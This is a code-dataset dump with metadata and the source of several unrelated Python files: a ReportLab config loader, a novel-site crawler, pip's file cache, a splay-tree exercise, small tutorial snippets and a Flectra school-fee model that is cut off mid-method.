blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
03e064a0bce0dd00a223a41938dc5d68dd20b8ce | 6437a3a4a31ab9ad233d6b2d985beb50ed50de23 | /PythonistaAppTemplate/PythonistaKit.framework/pylib/site-packages/reportlab/rl_config.py | 14438fb24175d622317b26fc4539590edf37a674 | [] | no_license | sreyemnayr/jss-lost-mode-app | 03ddc472decde3c17a11294d8ee48b02f83b71e7 | 3ff4ba6fb13f4f3a4a98bfc824eace137f6aabaa | refs/heads/master | 2021-05-02T08:50:10.580091 | 2018-02-08T20:32:29 | 2018-02-08T20:32:29 | 120,813,623 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,725 | py | #\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
'''module that aggregates config information'''
__all__=('_reset','register_reset')
def _defaults_init():
'''
create & return defaults for all reportlab settings from
reportlab.rl_settings.py
reportlab.local_rl_settings.py
reportlab_settings.py or ~/.reportlab_settings
latter values override earlier
'''
from reportlab.lib.utils import rl_exec
import os
_DEFAULTS={}
rl_exec('from reportlab.rl_settings import *',_DEFAULTS)
_overrides=_DEFAULTS.copy()
try:
rl_exec('from reportlab.local_rl_settings import *',_overrides)
_DEFAULTS.update(_overrides)
except ImportError:
pass
_overrides=_DEFAULTS.copy()
try:
rl_exec('from reportlab_settings import *',_overrides)
_DEFAULTS.update(_overrides)
except ImportError:
_overrides=_DEFAULTS.copy()
try:
with open(os.path.expanduser(os.path.join('~','.reportlab_settings')),'rb') as f:
rl_exec(f.read(),_overrides)
_DEFAULTS.update(_overrides)
except:
pass
return _DEFAULTS
_DEFAULTS=_defaults_init()
_SAVED = {}
sys_version=None
#this is used to set the options from
def _setOpt(name, value, conv=None):
'''set a module level value from environ/default'''
from os import environ
ename = 'RL_'+name
if ename in environ:
value = environ[ename]
if conv: value = conv(value)
globals()[name] = value
def _startUp():
'''This function allows easy resetting to the global defaults
If the environment contains 'RL_xxx' then we use the value
else we use the given default'''
import os, sys
global sys_version, _unset_
sys_version = sys.version.split()[0] #strip off the other garbage
from reportlab.lib import pagesizes
from reportlab.lib.utils import rl_isdir
if _SAVED=={}:
_unset_ = getattr(sys,'_rl_config__unset_',None)
if _unset_ is None:
class _unset_: pass
sys._rl_config__unset_ = _unset_ = _unset_()
global __all__
A = list(__all__)
for k,v in _DEFAULTS.items():
_SAVED[k] = globals()[k] = v
if k not in __all__:
A.append(k)
__all__ = tuple(A)
#places to search for Type 1 Font files
import reportlab
D = {'REPORTLAB_DIR': os.path.abspath(os.path.dirname(reportlab.__file__)),
'CWD': os.getcwd(),
'disk': os.getcwd().split(':')[0],
'sys_version': sys_version,
'XDG_DATA_HOME': os.environ.get('XDG_DATA_HOME','~/.local/share'),
}
for k in _SAVED:
if k.endswith('SearchPath'):
P=[]
for p in _SAVED[k]:
d = (p % D).replace('/',os.sep)
if '~' in d: d = os.path.expanduser(d)
if rl_isdir(d): P.append(d)
_setOpt(k,os.pathsep.join(P),lambda x:x.split(os.pathsep))
globals()[k] = list(filter(rl_isdir,globals()[k]))
else:
v = _SAVED[k]
if isinstance(v,(int,float)): conv = type(v)
elif k=='defaultPageSize': conv = lambda v,M=pagesizes: getattr(M,v)
else: conv = None
_setOpt(k,v,conv)
_registered_resets=[]
def register_reset(func):
'''register a function to be called by rl_config._reset'''
_registered_resets[:] = [x for x in _registered_resets if x()]
L = [x for x in _registered_resets if x() is func]
if L: return
from weakref import ref
_registered_resets.append(ref(func))
def _reset():
'''attempt to reset reportlab and friends'''
_startUp() #our reset
for f in _registered_resets[:]:
c = f()
if c:
c()
else:
_registered_resets.remove(f)
_startUp()
| [
"[email protected]"
] | |
0587480993283923fc28a800af3f56fc5d43a1d5 | 34e3147447875b491bd1b50c915f8848ead80792 | /uncertainty/constants.py | f19f8cdc91913b47521873fbed92985edbf59ce3 | [
"MIT"
] | permissive | meyersbs/uncertainty | 680f275ded6aad63012a7ca781d1cf455c66f226 | c12842cda7bea2d604bb9227a6c0baba9830b6fe | refs/heads/master | 2023-07-20T09:00:25.876780 | 2023-07-07T18:17:07 | 2023-07-07T18:17:07 | 87,837,406 | 19 | 5 | MIT | 2023-07-07T18:17:09 | 2017-04-10T17:16:51 | Python | UTF-8 | Python | false | false | 510 | py | from pkg_resources import resource_filename
BCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/bclass.p')
MCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/mclass.p')
VECTORIZER_PATH = resource_filename('uncertainty', 'vectorizers/vectorizer.p')
UNCERTAINTY_CLASS_MAP = {
'speculation_modal_probable_': 'E',
'speculation_hypo_doxastic _': 'D',
'speculation_hypo_condition _': 'N',
'speculation_hypo_investigation _': 'I',
'O': 'C'
}
| [
"[email protected]"
] | |
5865cee0434fa771b0ffd1e3c9bcb56df6e08c4a | 3967e42abb6f497ede6d342e8f74bd8150f9c52d | /src/spiders/qidiancom.py | b70dc6414c2c1f6637e2011d657997aa17ae923f | [
"Apache-2.0"
] | permissive | varunprashar5/lightnovel-crawler | 4886862115c5c3e15a9137e698e14253e14b7423 | 4ca387f3c8f17771befad1d48d417bbc7b9f8bfd | refs/heads/master | 2020-12-01T22:27:33.699798 | 2019-12-29T05:25:09 | 2019-12-29T05:25:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,465 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from ..utils.crawler import Crawler
logger = logging.getLogger('QIDIAN_COM')
chapter_list_url = 'https://book.qidian.com/ajax/book/category?_csrfToken=%s&bookId=%s'
chapter_details_url = 'https://read.qidian.com/chapter/%s'
class QidianComCrawler(Crawler):
def initialize(self):
self.home_url = 'https://www.qidian.com/'
# end def
def read_novel_info(self):
'''Get novel title, autor, cover etc'''
logger.debug('Visiting %s', self.novel_url)
soup = self.get_soup(self.novel_url)
self.novel_title = soup.select_one('.book-info h1 em').text
logger.info('Novel title: %s', self.novel_title)
self.novel_author = soup.select_one('.book-info h1 a.writer').text
logger.info('Novel author: %s', self.novel_author)
book_img = soup.select_one('#bookImg')
self.novel_cover = self.absolute_url(book_img.find('img')['src'])
self.novel_cover = '/'.join(self.novel_cover.split('/')[:-1])
logger.info('Novel cover: %s', self.novel_cover)
self.book_id = book_img['data-bid']
logger.debug('Book Id: %s', self.book_id)
self.csrf = self.cookies['_csrfToken']
logger.debug('CSRF Token: %s', self.csrf)
volume_url = chapter_list_url % (self.csrf, self.book_id)
logger.debug('Visiting %s', volume_url)
data = self.get_json(volume_url)
for volume in data['data']['vs']:
vol_id = len(self.volumes) + 1
self.volumes.append({
'id': vol_id,
'title': volume['vN'],
})
for chapter in volume['cs']:
ch_id = len(self.chapters) + 1
self.chapters.append({
'id': ch_id,
'volume': vol_id,
'title': chapter['cN'],
'url': chapter_details_url % chapter['cU'],
})
# end for
# end for
# end def
def download_chapter_body(self, chapter):
'''Download body of a single chapter and return as clean html format'''
logger.info('Downloading %s', chapter['url'])
soup = self.get_soup(chapter['url'])
chapter['body_lock'] = True
chapter['title'] = soup.select_one('h3.j_chapterName').text.strip()
return soup.select_one('div.j_readContent').extract()
# end def
# end class
| [
"[email protected]"
] | |
8e7ea66678d6525ed22d3dd5952486d8e44cd520 | 6923f79f1eaaba0ab28b25337ba6cb56be97d32d | /Fluid_Engine_Development_Doyub_Kim/external/src/pystring/SConscript | b6e8c9660762838555a40f518621f6873e7cf39a | [
"MIT"
] | permissive | burakbayramli/books | 9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0 | 5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95 | refs/heads/master | 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 | Jupyter Notebook | UTF-8 | Python | false | false | 320 | """
Copyright (c) 2016 Doyub Kim
"""
Import('env', 'os', 'utils')
script_dir = os.path.dirname(File('SConscript').rfile().abspath)
lib_env = env.Clone()
lib_env.Append(CPPPATH = [os.path.join(script_dir, 'pystring'), script_dir])
lib = lib_env.Library('pystring', 'pystring/pystring.cpp')
Return('lib_env', 'lib')
| [
"[email protected]"
] | ||
1d443fcd8a68dc9c0124dcbff16c16d020b695ab | 9e549ee54faa8b037f90eac8ecb36f853e460e5e | /venv/lib/python3.6/site-packages/pip/_vendor/cachecontrol/caches/file_cache.py | 10f2f222d46d9d3c3a69f254940903cb2be1c86b | [
"MIT"
] | permissive | aitoehigie/britecore_flask | e8df68e71dd0eac980a7de8c0f20b5a5a16979fe | eef1873dbe6b2cc21f770bc6dec783007ae4493b | refs/heads/master | 2022-12-09T22:07:45.930238 | 2019-05-15T04:10:37 | 2019-05-15T04:10:37 | 177,354,667 | 0 | 0 | MIT | 2022-12-08T04:54:09 | 2019-03-24T00:38:20 | Python | UTF-8 | Python | false | false | 4,176 | py | import hashlib
import os
from textwrap import dedent
from ..cache import BaseCache
from ..controller import CacheController
try:
FileNotFoundError
except NameError:
# py2.X
FileNotFoundError = (IOError, OSError)
def _secure_open_write(filename, fmode):
# We only want to write to this file, so open it in write only mode
flags = os.O_WRONLY
# os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
# will open *new* files.
# We specify this because we want to ensure that the mode we pass is the
# mode of the file.
flags |= os.O_CREAT | os.O_EXCL
# Do not follow symlinks to prevent someone from making a symlink that
# we follow and insecurely open a cache file.
if hasattr(os, "O_NOFOLLOW"):
flags |= os.O_NOFOLLOW
# On Windows we'll mark this file as binary
if hasattr(os, "O_BINARY"):
flags |= os.O_BINARY
# Before we open our file, we want to delete any existing file that is
# there
try:
os.remove(filename)
except (IOError, OSError):
# The file must not exist already, so we can just skip ahead to opening
pass
# Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a
# race condition happens between the os.remove and this line, that an
# error will be raised. Because we utilize a lockfile this should only
# happen if someone is attempting to attack us.
fd = os.open(filename, flags, fmode)
try:
return os.fdopen(fd, "wb")
except:
# An error occurred wrapping our FD in a file object
os.close(fd)
raise
class FileCache(BaseCache):
def __init__(
self,
directory,
forever=False,
filemode=0o0600,
dirmode=0o0700,
use_dir_lock=None,
lock_class=None,
):
if use_dir_lock is not None and lock_class is not None:
raise ValueError("Cannot use use_dir_lock and lock_class together")
try:
from pip._vendor.lockfile import LockFile
from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile
except ImportError:
notice = dedent(
"""
NOTE: In order to use the FileCache you must have
lockfile installed. You can install it via pip:
pip install lockfile
"""
)
raise ImportError(notice)
else:
if use_dir_lock:
lock_class = MkdirLockFile
elif lock_class is None:
lock_class = LockFile
self.directory = directory
self.forever = forever
self.filemode = filemode
self.dirmode = dirmode
self.lock_class = lock_class
@staticmethod
def encode(x):
return hashlib.sha224(x.encode()).hexdigest()
def _fn(self, name):
# NOTE: This method should not change as some may depend on it.
# See: https://github.com/ionrock/cachecontrol/issues/63
hashed = self.encode(name)
parts = list(hashed[:5]) + [hashed]
return os.path.join(self.directory, *parts)
def get(self, key):
name = self._fn(key)
try:
with open(name, "rb") as fh:
return fh.read()
except FileNotFoundError:
return None
def set(self, key, value):
name = self._fn(key)
# Make sure the directory exists
try:
os.makedirs(os.path.dirname(name), self.dirmode)
except (IOError, OSError):
pass
with self.lock_class(name) as lock:
# Write our actual file
with _secure_open_write(lock.path, self.filemode) as fh:
fh.write(value)
def delete(self, key):
name = self._fn(key)
if not self.forever:
try:
os.remove(name)
except FileNotFoundError:
pass
def url_to_file_path(url, filecache):
"""Return the file cache path based on the URL.
This does not ensure the file exists!
"""
key = CacheController.cache_url(url)
return filecache._fn(key)
| [
"[email protected]"
] | |
6757f60ad54e92de598316caec907e610dd16c53 | e01c5d1ee81cc4104b248be375e93ae29c4b3572 | /Sequence4/DS/Week5/submission/sub-range-4.py | 585c33c2a3133ca7749fcb1568e035d6b909e7e3 | [] | no_license | lalitzz/DS | 7de54281a34814601f26ee826c722d123ee8bd99 | 66272a7a8c20c0c3e85aa5f9d19f29e0a3e11db1 | refs/heads/master | 2021-10-14T09:47:08.754570 | 2018-12-29T11:00:25 | 2018-12-29T11:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,351 | py | # python3
from sys import stdin
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
# Splay tree implementation
# Vertex of a splay tree
class Vertex:
def __init__(self, key, sum, left, right, parent):
(self.key, self.sum, self.left, self.right, self.parent) = (key, sum, left, right, parent)
class SplayTree:
def update(self, v):
if v == None:
return
v.sum = v.key + (v.left.sum if v.left != None else 0) + (v.right.sum if v.right != None else 0)
if v.left != None:
v.left.parent = v
if v.right != None:
v.right.parent = v
def smallRotation(self, v):
parent = v.parent
if parent == None:
return
grandparent = v.parent.parent
if parent.left == v:
m = v.right
v.right = parent
parent.left = m
else:
m = v.left
v.left = parent
parent.right = m
self.update(parent)
self.update(v)
v.parent = grandparent
if grandparent != None:
if grandparent.left == parent:
grandparent.left = v
else:
grandparent.right = v
def bigRotation(self, v):
if v.parent.left == v and v.parent.parent.left == v.parent:
# Zig-zig
self.smallRotation(v.parent)
self.smallRotation(v)
elif v.parent.right == v and v.parent.parent.right == v.parent:
# Zig-zig
self.smallRotation(v.parent)
self.smallRotation(v)
else:
# Zig-zag
self.smallRotation(v)
self.smallRotation(v)
# Makes splay of the given vertex and makes
# it the new root.
def splay(self, v):
if v == None:
return None
while v.parent != None:
if v.parent.parent == None:
self.smallRotation(v)
break
self.bigRotation(v)
return v
# Searches for the given key in the tree with the given root
# and calls splay for the deepest visited node after that.
# Returns pair of the result and the new root.
# If found, result is a pointer to the node with the given key.
# Otherwise, result is a pointer to the node with the smallest
# bigger key (next value in the order).
# If the key is bigger than all keys in the tree,
# then result is None.
def find(self, root, key):
v = root
last = root
next = None
while v != None:
if v.key >= key and (next == None or v.key < next.key):
next = v
last = v
if v.key == key:
break
if v.key < key:
v = v.right
else:
v = v.left
root = self.splay(last)
return (next, root)
def split(self, root, key):
(result, root) = self.find(root, key)
if result == None:
return (root, None)
right = self.splay(result)
left = right.left
right.left = None
if left != None:
left.parent = None
self.update(left)
self.update(right)
return (left, right)
def merge(self, left, right):
if left == None:
return right
if right == None:
return left
while right.left != None:
right = right.left
right = self.splay(right)
right.left = left
self.update(right)
return right
class SetRange:
# Code that uses splay tree to solve the problem
root = None
S = SplayTree()
def insert(self, x):
(left, right) = self.S.split(self.root, x)
new_vertex = None
if right == None or right.key != x:
new_vertex = Vertex(x, x, None, None, None)
self.root = self.S.merge(self.S.merge(left, new_vertex), right)
def erase(self, x):
if self.search(x) is None:
return
self.S.splay(self.root)
self.root = self.S.merge(self.root.left, self.root.right)
if self.root is not None:
self.root.parent = None
def search(self, x):
# Implement find yourself
result, self.root = self.S.find(self.root, x)
if result is None or self.root.key != x:
return None
return result.key
def sum(self, fr, to):
(left, middle) = self.S.split(self.root, fr)
(middle, right) = self.S.split(middle, to + 1)
ans = 0
# Complete the implementation of sum
if middle is None:
ans = 0
self.root = self.S.merge(left, right)
else:
ans = middle.sum
self.root = self.S.merge(self.S.merge(left, middle), right)
return ans
def get_tree(self):
print(self.root.key)
self._get_tree(self.root)
def _get_tree(self, root):
if root:
self._get_tree(root.left)
print(root.key)
self._get_tree(root.right)
def main():
MODULO = 1000000001
n = int(stdin.readline())
last_sum_result = 0
s = SetRange()
for i in range(n):
line = stdin.readline().split()
if line[0] == '+':
x = int(line[1])
s.insert((x + last_sum_result) % MODULO)
elif line[0] == '-':
x = int(line[1])
s.erase((x + last_sum_result) % MODULO)
elif line[0] == '?':
x = int(line[1])
print('Found' if s.search((x + last_sum_result) % MODULO) is not None else 'Not found')
elif line[0] == 's':
l = int(line[1])
r = int(line[2])
res = s.sum((l + last_sum_result) % MODULO, (r + last_sum_result) % MODULO)
print(res)
last_sum_result = res % MODULO
elif line[0] == 'c':
s.get_tree()
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
871f3e48a561c6d3a0a81e78fb26e52f6fa2eb7c | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2/gavicharla/codejam1.py | 25da9175da664053709c8d25e93ab4bca77cade7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 515 | py | def flip(s,l):
str1 = []
for i in range(l):
if(s[i] == '-'):
str1.append('+')
else:
str1.append('-')
return "".join(str1)
test_cases = int(raw_input())
for test in range(test_cases):
s = raw_input()
l = len(s)
count = l
let =0
while ('-' in s):
let+=1
last_m = s[:count].rfind("-")
s = flip(s[:last_m+1],last_m+1)+s[last_m+1:]
count = s.rfind("+")
print "case #"+str(test+1)+": "+str(let) | [
"[[email protected]]"
] | |
f039f11f1012417d425afe36144602e290845663 | dc182e5b4597bdd104d6695c03744a12ebfe2533 | /PythonScripts/cache_decorator.py | 13a86e3faccaa6620f606d3880ecb8559d34a2e1 | [] | no_license | srinaveendesu/Programs | 06fb4a4b452445e4260f9691fe632c732078d54d | f6dbd8db444678b7ae7658126b59b381b3ab0bab | refs/heads/master | 2023-01-27T14:42:40.989127 | 2023-01-18T22:36:14 | 2023-01-18T22:36:14 | 129,948,488 | 1 | 0 | null | 2022-09-13T23:06:04 | 2018-04-17T18:30:13 | Python | UTF-8 | Python | false | false | 404 | py | def cache(func):
"""Keep a cache of previous function calls"""
@functools.wraps(func)
def wrapper_cache(*args, **kwargs):
cache_key = args + tuple(kwargs.items())
if cache_key not in wrapper_cache.cache:
wrapper_cache.cache[cache_key] = func(*args, **kwargs)
return wrapper_cache.cache[cache_key]
wrapper_cache.cache = dict()
return wrapper_cache | [
"[email protected]"
] | |
4a37455d9a0b65a8c4aec6586528fc1fcda1e472 | 085d3f2f8de5442d69962a65b8acd79478599022 | /2.Dictionaries - the root of Python/Safely finding by key.py | e66f37889bfe6d285916f26ea00f6830005db3ba | [] | no_license | Mat4wrk/Data-Types-for-Data-Science-in-Python-Datacamp | bfe8f8c4d4bc3998ef612f0d3137b15e662209d0 | c2eb30d3c500f69486921d26071a2ef2244e0402 | refs/heads/main | 2023-03-13T10:06:10.748044 | 2021-03-07T14:43:25 | 2021-03-07T14:43:25 | 331,574,648 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | # Safely print rank 7 from the names dictionary
print(names.get(7))
# Safely print the type of rank 100 from the names dictionary
print(type(names.get(100)))
# Safely print rank 105 from the names dictionary or 'Not Found'
print(names.get(105, 'Not Found'))
| [
"[email protected]"
] | |
368da12078ad24bb8c1403761b573a5acd4f731c | 2a54e8d6ed124c64abb9e075cc5524bb859ba0fa | /.history/1-Python-Basics/4-bind()-complex_20200412164915.py | 3951d6e1beff4faa4c6fcf2e2f7923a3bcedeff0 | [] | no_license | CaptainStorm21/Python-Foundation | 01b5fbaf7a913506518cf22e0339dd948e65cea1 | a385adeda74f43dd7fb2d99d326b0be23db25024 | refs/heads/master | 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | #complex
z = complex(2, -3)
print(z)
z = complex(1)
print(z)
z = complex()
print(z)
z = complex('5-9j')
print(z)
# output
# (2-3j)
# (1+0j)
# 0j
# (5-9j)
#binary
print(bin(5))
# binary output 0b101
#binary with letter b with python
#non-python binary number of 5 is 101
#convert from binary into an integer
print()
| [
"[email protected]"
] | |
782de249b46f09546dcf741a0fc5f71b7f5aca5e | a03303e46f21697c9da87d0bb0f7b0a3077aba5c | /siswa_keu_ocb11/models/biaya_ta_jenjang.py | 8c0710c7ba375eaad0378bdde9362af08f91cddd | [] | no_license | butirpadi/flectra_app_sek | fccd3e47ef261e116478e6da7f0cc544ee67f127 | 00fa36d9176511f8ffe3c7636a8434ee2ed8c756 | refs/heads/master | 2020-04-06T10:26:37.053024 | 2018-11-19T23:59:34 | 2018-11-20T00:17:02 | 157,380,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,290 | py | # -*- coding: utf-8 -*-
from flectra import models, fields, api, _
from pprint import pprint
from datetime import datetime, date
import calendar
class biaya_ta_jenjang(models.Model):
_name = 'siswa_keu_ocb11.biaya_ta_jenjang'
name = fields.Char('Name', related="biaya_id.name")
tahunajaran_jenjang_id = fields.Many2one('siswa_ocb11.tahunajaran_jenjang', string='Tahun Ajaran', required=True, ondelete='cascade')
biaya_id = fields.Many2one('siswa_keu_ocb11.biaya', string='Biaya', required=True)
is_different_by_gender = fields.Boolean('Different by Gender', related='biaya_id.is_different_by_gender')
harga = fields.Float('Harga', required=True, default=0)
harga_alt = fields.Float('Harga (Alt)', required=True, default=0)
def recompute_biaya_ta_jenjang(self):
print('recompute biaya ta jenjang')
# get data siswa
rb_sis_ids = self.env['siswa_ocb11.rombel_siswa'].search([
('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
('jenjang_id', '=', self.tahunajaran_jenjang_id.jenjang_id.id),
])
for sis in rb_sis_ids:
siswa = sis.siswa_id
total_biaya = 0
if sis.siswa_id.active:
if self.biaya_id.assign_to == 'all' or (siswa.is_siswa_lama and self.biaya_id.assign_to == 'lama') or (not siswa.is_siswa_lama and self.biaya_id.assign_to == 'baru'):
# if siswa.is_siswa_lama and self.biaya_id.is_siswa_baru_only:
# print('skip')
# else:
print('JENJANG ID : ' + str(self.tahunajaran_jenjang_id.jenjang_id.id))
if self.biaya_id.is_bulanan:
for bulan_index in range(1, 13):
harga = self.harga
if self.biaya_id.is_different_by_gender:
if siswa.jenis_kelamin == 'perempuan':
harga = self.harga_alt
self.env['siswa_keu_ocb11.siswa_biaya'].create({
'name' : self.biaya_id.name + ' ' + calendar.month_name[bulan_index],
'siswa_id' : siswa.id,
'tahunajaran_id' : self.tahunajaran_jenjang_id.tahunajaran_id.id,
'biaya_id' : self.biaya_id.id,
'bulan' : bulan_index,
'harga' : harga,
'amount_due' : harga,
'jenjang_id' : self.tahunajaran_jenjang_id.jenjang_id.id
})
total_biaya += harga
else:
harga = self.harga
if self.biaya_id.is_different_by_gender:
if siswa.jenis_kelamin == 'perempuan':
harga = self.harga_alt
self.env['siswa_keu_ocb11.siswa_biaya'].create({
'name' : self.biaya_id.name,
'siswa_id' : siswa.id,
'tahunajaran_id' : self.tahunajaran_jenjang_id.tahunajaran_id.id,
'biaya_id' : self.biaya_id.id,
'harga' : harga,
'amount_due' : harga,
'jenjang_id' : self.tahunajaran_jenjang_id.jenjang_id.id
})
total_biaya += harga
# set total_biaya dan amount_due
# total_biaya = sum(self.harga for by in self.biayas)
print('ID SISWA : ' + str(siswa.id))
res_partner_siswa = self.env['res.partner'].search([('id', '=', siswa.id)])
self.env['res.partner'].search([('id', '=', siswa.id)]).write({
'total_biaya' : total_biaya,
'amount_due_biaya' : res_partner_siswa.amount_due_biaya + total_biaya,
})
# Recompute Tagihan Siswa Dashboard/ Keuangan Dashboard
self.recompute_dashboard()
def reset_biaya_ta_jenjang(self):
rb_sis_ids = self.env['siswa_ocb11.rombel_siswa'].search([
('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
('jenjang_id', '=', self.tahunajaran_jenjang_id.jenjang_id.id),
])
for sis in rb_sis_ids:
siswa = sis.siswa_id
